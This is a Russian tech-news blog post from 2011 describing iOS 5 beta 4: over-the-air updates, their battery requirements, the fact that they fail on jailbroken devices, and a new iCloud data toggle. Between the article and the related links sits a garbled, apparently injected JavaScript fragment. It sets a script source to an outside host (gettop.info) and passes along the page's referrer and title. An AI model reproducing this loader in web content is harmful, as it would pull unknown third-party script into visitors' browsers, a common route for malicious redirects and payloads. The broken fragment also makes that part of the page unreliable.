Что новенького в iOS 5 beta 4?

23.07.2011, Новости, Софт, Кирилл Месяц

Ресурс InsanelyGreatMac опубликовал видео, представленное выше, где показано обновление «по воздуху» (over-the-air, OTA) в действии, новая фича iOS 5 beta 4. Как мы уже отмечали, эта функция экономит количество загружаемых данных, поскольку она лишь применяет изменения, а не загружает весь образ ОС.

-Хакер @MuscleNerd сообщает, что OTA обновление не будет работать на джейлбрейкнутых девайсах.

-Мы ранее сообщали, что iPhone должен иметь не менее 50% заряда батареи или быть подключенным к источнику питания для загрузки обновлений, но @johnheimkes сообщил, что это требование вовсе не является обязательным для iPad, для которого хватило лишь 12% зарядки аккумулятора.

-Когда воздушное обновление будет доступно, значок «Настройки» сообщит вам об этом.

-Apple добавила переключатель «Документы и данные» для iCloud, который позволяет включать/выключать возможность для приложений сохранять в iCloud данные и документы. Также можно выбрать, будут ли эти обновления загружаться через 3G или только по Wi-Fi. Это позволяет приложениям сохранять свои собственные данные и данные пользователя в iCloud, что сделает их доступными на всех устройствах, а также для резервного копирования в облако.

-Обновления по воздуху доступны через 3G или Wi-Fi соединение.

} else {

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

Читайте также:

  1. Вышла iOS 5 Beta 4 для разработчиков
  2. Apple выпустила iOS 5 beta 3, iTunes 10.5 beta 3, Xcode 4.2 Preview 3, Xcode 4.1 GM для разработчиков
  3. Apple выпустила второй beta релиз новой прошивки iOS 5
  4. По сообщениям одного из разработчиков, iOS 5 beta привела к возгаранию кабеля

Оставить комментарий

Обязательно.

Обязательно. Не публикуется.